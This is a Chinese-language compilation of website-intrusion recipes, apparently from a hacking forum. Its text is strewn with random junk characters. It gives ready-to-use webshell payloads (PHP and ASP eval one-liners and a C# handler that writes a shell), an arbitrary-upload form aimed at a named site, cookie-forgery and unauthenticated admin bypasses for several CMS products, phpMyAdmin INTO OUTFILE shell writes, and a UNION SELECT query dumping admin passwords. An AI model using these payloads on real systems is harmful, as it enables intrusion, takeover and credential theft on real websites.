0 D: Z0 H4 u7 P2 L& P如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件/ K# X0 T3 I# m" N" O# G
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">+ S2 P0 Y$ l. [2 i" ?+ q9 i W
Upload a new file:<br>
7 w5 @# ~4 O% K7 A& |<input type="file" name="NewFile" size="50"><br>; Q3 ? n- q1 j- r8 L c6 |
<input id="btnUpload" type="submit" value="Upload">, z+ E/ O6 ?- T3 ^' Q
</form>
) n) ?! M2 c# i4 S: d; Z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ J- N% n8 h3 F- P; ^4 i6 s' L
0 s" k5 P% F$ [/ \; [ t) nSDcms 后台拿webshell
$ ?! a' d6 q+ [, `6 k6 { n. _
[3 [" J8 j0 m! u0 `! E第一种方法:
; s( D9 Z: t( D1 y进入后台-->系统管理-->系统设置-->系统设置->网站名称;+ V& _. K. c' Z* V7 e
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx& r5 K3 [, I1 v7 G4 d* G3 M
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。, h+ I+ n; l3 s3 v, F" N
第二种方法:
2 D$ o7 }1 w2 I& Q进入后台-->系统管理-->系统设置-->系统设置->上传设置;
* I& \5 E' G, P在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!/ m' t9 p/ H: M L" d- C' x0 z: Y
第三种方法:
. M) W% e" @ {进入后台-->界面管理-->模板文件管理-->创建文件
" i& Z- Z& q! K文件名写入getshell.ashx
' w3 e; a: N" ~6 d# E$ M$ e内容写入下面内容:# L5 d$ Q# r/ p0 y/ m7 j3 ~
/====================复制下面的=========================/
/ ]# X& \+ S) S1 M( v<%@ WebHandler Language="C#" Class="Handler" %>) h- y+ v2 x/ V0 g' P% n
using System;
7 r. U6 i! f9 t8 b$ P# N, l4 kusing System.Web;* o% y. H7 x O O5 ]
using System.IO;
3 z3 x3 ~; l( B# Z) epublic class Handler : IHttpHandler {4 |: |) o. L% P, U6 [* D6 o k, U
public void ProcessRequest (HttpContext context) {0 f: Y3 K- U# ~
context.Response.ContentType = "text/plain";
7 ]3 e( |& c2 \/ v4 A. xStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
" M/ b/ N, g8 ]. x8 L5 ]9 xfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
* B) v* z2 ~8 B6 Nfile1.Flush();
7 h7 \3 @' \$ k- u+ K+ P. b# Gfile1.Close();
9 l. }$ F5 j: W- }}
+ {. u- Z( u0 O# c; Ipublic bool IsReusable {
% f4 I% U$ p: n% j" q4 rget {
4 H/ R: Y: d6 ?( Sreturn false;
) N" t# o4 @6 }1 ~* t; v* j}4 b# A+ D( K6 U" U+ b6 T. e) i
}
. P6 T' t$ r% k6 k: `/ r0 B7 |0 f}+ d, e# D! F5 }
/=============================================/* y0 \& {3 J% ^& N8 |
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx3 q* t; Z( j! r* e8 H
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接+ t3 l. C2 _ m& w/ c# N
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( n+ x' ?6 c) G5 N+ ]
/ n& G3 k9 ]! G, }2 C" s
ESCMS网站管理系统0day
4 S( s1 s) J" E+ Q( l2 s8 Z! g/ @( t/ h2 _" N/ y- Z w8 X% _
后台登陆验证是通过admin/check.asp实现的# |% C) S% _2 r3 }7 o
8 f6 t: G! D+ j7 _, l9 L首先我们打开http://target.com/admin/es_index.html
$ j3 ^- X; @" O$ |. v$ _然后在COOKIE结尾加上
2 M( M' J- Y) ~$ w2 \- Y. e; ESCMS$_SP2=ES_admin=st0p;
! }7 a: J5 [7 f% W( @( x3 G修改,然后刷新
! A$ x3 `, a3 E9 {' A1 J进后台了嘎..% M& o* l0 @: k) Y
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
! I4 o0 B- x/ W; D
" A, \7 z9 L/ p. x利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.1 k3 p8 V J& U9 y
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
$ H/ `& p) P; _3 Q) d: A7 `$ {存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..! R1 e( C- G# g! r& ^
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- _6 Q% Y" A2 ?7 E9 {- r- J: h------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( V6 T$ u j3 e6 F% h& `# U# i
) z: K( J! [ `9 t( c# A9 ~) L( B宁志网站管理系统后台无验证漏洞及修复9 O$ b3 a3 D I" t9 |5 h! h! i
4 M2 y3 O9 e4 `$ B: a' A- U- o
网上搜了一下,好像没有发布.如有雷同纯粹巧合!/ G, q$ k6 J, s' N2 G! V
官方网站:www.ningzhi.net
4 ]# L/ x3 Q, j学校网站管理系统 V.2011版本
" v, a% }- U7 f; nhttp://down.chinaz.com/soft/29943.htm 5 q. j b7 x5 s7 X; E, ?
其它版本(如:政府版等),自行下载.. | b/ z" G' _# ]
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
# n& _; I/ I8 Ylogin.asp代码如下: P7 H. K' Y6 x3 m0 r
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 0 z% k- i0 a) F _( x
manage.asp代码我就不帖出来了.反正也没验证.: [& g4 Y& [ C3 D3 [
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!3 D3 [( ^9 z& H& i
漏洞利用:
( t8 T9 a3 J/ x: q4 W: S: b8 Q# I) u直接访问http://www.0855.tv/admin/manage.asp
# M5 D/ t5 g4 u" `! n2 c9 s数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
) n4 V3 M0 j" o4 r& @. m----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 d) I4 q' |7 I$ E7 m* e/ i
, H P9 B U# d+ ?+ B0 N7 [phpmyadmin拿shell的四种方法总结及修复
! `2 g' A# Z% D3 P4 v" g
5 a8 P0 X/ {% k7 w( h3 v方法一:
2 |; T/ h0 s9 f9 i2 OCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );: z+ [3 O* w+ I% {+ N+ T
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');# ?) a$ f2 I' [& z! I
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';0 q7 E8 w% S+ g; S( h0 m
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 W$ U2 l+ X5 W" Y+ v$ r2 x 一句话连接密码:7on& H7 a, y& |% \+ |% ]
方法二:+ r+ N2 s9 B1 g9 v3 P
读取文件内容: select load_file('E:/xamp/www/s.php');
& o5 h- V0 W. ~1 M. h写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php': C9 v) ^' Y, I+ J$ W' H5 G
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
. q3 G6 J) V) F2 u4 m, ~6 N+ e方法三:, d9 b e+ u7 ]4 g
JhackJ版本 PHPmyadmin拿shell
9 B5 ^" c2 W4 c2 X* K5 MCreate TABLE study (cmd text NOT NULL);7 p0 @0 k+ t1 a" o# n0 d0 [' F- ]
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
9 ?1 t6 ~( c" H7 u2 |8 t- S5 \select cmd from study into outfile 'E:/wamp/www/7.php';
$ s& T, R# B4 Q3 ]Drop TABLE IF EXISTS study;2 s' k, F( T) n! W3 ?
<?php eval($_POST[cmd])?>0 \1 C! k H3 a; F" ~; g
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。+ U c7 I% d h3 i& @( ~- c7 m: R- G
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
Z9 z) c/ o; o) \% p4 q% l5 |+ ^" hSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
9 p4 G! O9 p$ E# mDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。7 T% a2 M V: v0 a2 I/ P* O
方法四:
( P0 z/ h' I8 u- v* Z2 A5 nselect load_file('E:/xamp/www/study.php');
( t2 C6 [: `. r, @2 Q3 bselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'; B8 H0 A% F, Y9 S! q0 f
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
^3 Z& S3 y8 p-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
# |5 C& T. Z+ G+ m+ Y" O+ C; f
6 D% |5 x0 }) Q) oNO.001中学网站管理系统 Build 110628 注入漏洞 y* h2 H0 A. t6 h$ J4 h
' x4 Y7 l2 p! }0 w. l/ e2 NNO.001中学网站管理系统功能模块:) R- l; V, V/ h% A9 ^& s
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等" @& B: x8 |* s/ i( F
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息: h! S# |8 m9 S
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
' ]% s7 G4 l4 r4.视频图片管理:一级分类,动态添加视频或者图片等信息
* `: ]" H. }# x+ l5.留言管理:对留言,修改,删除、回复等管理4 P) Y! a: N e9 k! R
6.校友频道:包括校友资料excel导出、管理等功能
' P+ O0 D8 d5 e% C7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页; Z' _0 x N5 p8 F& P7 U/ \
默认后台:admin/login.asp% s# K6 O* f8 N2 J4 I
官方演示:http://demo.001cms.net
/ z4 c* q( p) F' \& k, D源码下载地址:http://down.chinaz.com/soft/30187.htm- Q1 K6 ] b& @8 D, R' f
EXP:
+ u* O0 F/ U4 b' f9 kunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 p1 y$ E/ w \& E5 p0 m
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin; s0 \! }2 \6 N# K, o! Z' q/ i
getshell:后台有备份,你懂的5 b4 ]' ]! P- x+ I. L
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
+ }6 l# e1 I. d8 U7 P, n------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |